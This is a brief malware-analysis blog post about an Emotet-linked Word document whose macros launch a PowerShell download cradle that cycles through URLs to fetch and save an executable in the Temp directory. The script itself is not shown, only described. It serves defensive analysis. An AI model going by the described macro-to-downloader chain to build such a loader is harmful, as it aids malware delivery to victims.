Today I wanted to do a real quick post on a PowerShell downloader linked to Emotet. Here is a little background on what Emotet is according to Malwarebytes:

Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive either via malicious script, macro-enabled document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click the malicious files by using tempting language about “Your Invoice,” “Payment Details,” or possibly an upcoming shipment from well-known parcel companies.

The strain I will be looking at was delivered through this word document acquired from https://www.malware-traffic-analysis.net/2019/01/18/index.html

Once the macros inside the document are launched by enabling the content cmd.exe will spawn a PowerShell process.

Lets’ take a look at the contents of the PowerShell script that was kicked off.

So here we can see that it is building a PowerShell download cradle that is iterating through the listed URL’s and attempting to download 477.exe and save it to the AppData\Local\Temp directory. Here is a look at what some of the variables contain.

So thank you for reading and until next time…

Happy hunting,

Marcus

References:

https://www.malwarebytes.com/emotet/